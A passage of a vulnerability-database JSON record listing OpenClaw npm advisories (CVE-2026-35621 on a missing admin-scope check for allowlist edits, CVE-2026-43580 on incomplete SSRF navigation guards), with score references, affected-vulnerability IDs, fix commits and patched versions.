`operator.admin` for internal gateway channels\n\nThis should happen before `plugin.allowlist.applyConfigEdit(...)` and before `writeConfigFile(...)`.\n\n### 2) Keep Pairing-Store and Config-Write Policy Checks, but Do Not Treat Them as Scope Enforcement\n\n`configWrites` policy and pairing-store behavior are useful secondary controls, but they do not replace the missing privilege check between `operator.write` and `operator.admin`.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35621",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00038",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1167",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00038",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11631",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00038",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11665",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35621"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-94pw-c6m8-p9p9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:21:07Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-94pw-c6m8-p9p9"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35621",
                    "reference_id": "CVE-2026-35621",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35621"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-94pw-c6m8-p9p9",
                    "reference_id": "GHSA-94pw-c6m8-p9p9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-94pw-c6m8-p9p9"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence",
                    "reference_id": "openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:21:07Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.24",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5dj5-mk23-kyds"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-66nc-bn98-nbas"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-acy1-83py-efhr"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-utv2-tyje-kfht"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vv2u-u7mn-rfe1"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"
                }
            ],
            "aliases": [
                "CVE-2026-35621",
                "GHSA-94pw-c6m8-p9p9"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pa1f-qzsh-efa9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89001?format=api",
            "vulnerability_id": "VCID-pae5-uyu7-k3c1",
            "summary": "OpenClaw: Browser press/type interaction routes missed complete navigation guard coverage\n## Summary\n\nBrowser press/type interaction routes missed complete navigation guard coverage.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nSome browser press/type-style interactions could trigger navigation without complete post-action SSRF policy enforcement.\n\n## Technical Details\n\nThe fix applies a three-phase interaction navigation guard to navigation-capable interactions, including pressKey and type submit flows.\n\n## Fix\n\nThe issue was fixed in #62023, #63226, and #63889. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe`\n- `5f5b3d733bdd791cb457f838514179e1288b10b3`\n- `e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894`\n- PR: #62023, #63226, #63889\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43580",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10026",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1001",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00038",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1159",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43580"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/62023",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/62023"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/63226",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/63226"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/63889",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/63889"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-536q-mj95-h29h",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-536q-mj95-h29h"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43580",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43580"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-incomplete-navigation-guard-coverage-in-browser-interactions",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
